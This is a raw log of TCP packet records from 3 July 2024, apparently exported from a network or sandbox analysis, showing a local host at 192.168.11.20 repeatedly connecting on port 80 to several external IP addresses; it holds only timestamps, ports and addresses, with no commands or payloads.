                                                            Jul 3, 2024 17:37:53.388875961 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.388889074 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.388978004 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.388998985 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.389098883 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.389525890 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.389571905 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.389635086 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.389705896 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.389811993 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.389825106 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.389842987 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.389990091 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.390393972 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.390475035 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.390553951 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.390567064 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.390578985 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.390638113 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.390769958 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.391253948 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.391268015 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.391407013 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.391407013 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.399492979 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.518069983 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:58.598694086 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:58.951638937 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:58.951872110 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:58.967653990 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:59.320305109 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.900204897 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.900304079 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.900315046 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.900326967 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.900486946 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:59.908879042 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.908893108 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.909184933 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:59.950911999 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.951092958 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:59.969660044 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.969681025 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.969846964 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:59.969871044 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.970005035 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:00.471358061 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:01.502748966 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:01.864537001 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:01.864685059 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:01.880491972 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:02.247412920 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.954888105 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.954901934 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.954911947 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.954924107 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.955087900 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:02.960083961 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.960196018 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.960278988 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:03.000777960 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:03.007447958 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:03.022207022 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:03.022217989 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:03.022368908 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:03.022427082 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:03.022521973 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:03.392554045 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:04.422039986 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:04.772778988 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:04.772948980 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:04.789894104 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:04.789916992 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:04.789993048 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.140671015 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.140852928 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.141164064 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.141386032 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.141565084 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.491250038 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.491457939 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.491476059 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.491643906 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.491799116 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.491813898 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.491983891 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.491988897 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.492093086 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.492146969 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.492326021 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.842888117 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.842979908 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.842991114 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.298194885 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.407634020 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.407727957 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.407741070 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.407843113 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.407845974 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.407995939 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.407996893 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.408109903 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.410883904 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.410897970 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.411149979 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.411149979 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.440820932 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.440999031 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.450289965 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.450382948 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.450475931 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.450582027 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.450589895 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.450702906 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:06.450706959 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:06.652730942 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:07.329433918 CEST4979880192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:07.689198017 CEST8049798103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:07.689511061 CEST4979880192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:07.702914000 CEST4979880192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:08.056015015 CEST8049798103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:08.600579023 CEST8049798103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:08.600594997 CEST8049798103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:08.600965023 CEST4979880192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:08.607691050 CEST4979880192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:08.966783047 CEST8049798103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:13.832983971 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.016344070 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.016877890 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.032248974 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.208826065 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226490974 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226507902 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226520061 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226532936 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226572990 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226587057 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226728916 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226742029 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226803064 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.226844072 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226856947 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.226974010 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.227143049 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.408354998 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.408370018 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.408519983 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:14.408525944 CEST8049799203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:14.408689022 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:15.546391964 CEST4979980192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.578078985 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.765945911 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.766118050 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.781913042 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.955415964 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.967883110 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.967956066 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968014956 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968070030 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968126059 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968214989 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968216896 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.968277931 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968333006 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968386889 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968388081 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.968388081 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.968442917 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:16.968559980 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:16.968718052 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:17.144581079 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:17.144604921 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:17.144627094 CEST8049800203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:17.144797087 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:18.295553923 CEST4980080192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.325069904 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.504719973 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.505256891 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.538357019 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.538407087 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.538464069 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.712805986 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.713001013 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.713049889 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.713098049 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.713247061 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.713257074 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.713468075 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.713526011 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.713577032 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.713633060 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.713802099 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.892627001 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.892637968 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.892647028 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:19.892807007 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.892855883 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.892915964 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:19.893083096 CEST4980180192.168.11.20203.161.50.127
                                                            Jul 3, 2024 17:38:20.071377039 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.071394920 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.071407080 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098349094 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098453999 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098535061 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098586082 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:38:20.098634005 CEST8049801203.161.50.127192.168.11.20
                                                            Jul 3, 2024 17:39:18.719861031 CEST4981580192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:19.749320984 CEST4981680192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:20.005415916 CEST804981684.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:20.005553961 CEST4981680192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:20.021413088 CEST4981680192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:20.284609079 CEST804981684.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:20.926676989 CEST804981684.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:20.926695108 CEST804981684.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:20.926825047 CEST4981680192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:21.531919956 CEST4981680192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:22.563051939 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:22.809257030 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:22.809402943 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:22.826396942 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:22.826476097 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.073259115 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:23.073486090 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.073553085 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.073599100 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.073601007 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:23.073941946 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.324527025 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:23.324693918 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.324707031 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:23.324744940 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.324791908 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:23.324887037 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:23.325063944 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:23.595683098 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:24.262131929 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:24.262145042 CEST804981784.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:24.262309074 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:24.343873024 CEST4981780192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:25.373061895 CEST4981880192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:25.637356043 CEST804981884.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:25.637614012 CEST4981880192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:25.651051998 CEST4981880192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:25.898138046 CEST804981884.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:26.555114985 CEST804981884.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:26.555211067 CEST804981884.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:26.555296898 CEST804981884.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:39:26.555486917 CEST4981880192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:26.555486917 CEST4981880192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:26.562237024 CEST4981880192.168.11.2084.32.84.192
                                                            Jul 3, 2024 17:39:26.809300900 CEST804981884.32.84.192192.168.11.20
                                                            Jul 3, 2024 17:41:04.469784975 CEST4982080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:04.588366985 CEST80498203.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:04.588613987 CEST4982080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:04.604430914 CEST4982080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:04.723071098 CEST80498203.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:04.745064974 CEST80498203.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:04.745224953 CEST4982080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:06.118282080 CEST4982080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:06.236877918 CEST80498203.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:07.147705078 CEST4982180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:07.266264915 CEST80498213.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:07.266488075 CEST4982180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:07.282335043 CEST4982180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:07.400875092 CEST80498213.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:07.425645113 CEST80498213.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:07.425884008 CEST4982180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:08.789573908 CEST4982180192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:08.908052921 CEST80498213.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:09.819084883 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:09.937704086 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:09.937927008 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:09.955025911 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:09.955060005 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:09.955136061 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.073673964 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.073740005 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.073859930 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.073880911 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.073956966 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074006081 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.074023008 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074075937 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074122906 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074177027 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074182034 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.074225903 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074275970 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.074352026 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.074527979 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.092958927 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.093095064 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.192958117 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193015099 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193048000 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193129063 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193130970 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.193161011 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193180084 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.193227053 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.193259001 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193376064 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193401098 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.193403959 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193428040 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193519115 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193547964 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193568945 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:10.193640947 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193674088 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193746090 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193865061 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.193893909 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.194005013 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.194119930 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.194150925 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.194222927 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.311764956 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.311791897 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.311804056 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.311913013 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312032938 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312181950 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312288046 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312429905 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312448025 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312463999 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312549114 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:10.312665939 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:11.460804939 CEST4982280192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:11.579257011 CEST80498223.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:12.490268946 CEST4982380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:12.608846903 CEST80498233.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:12.608973980 CEST4982380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:12.622332096 CEST4982380192.168.11.203.33.130.190
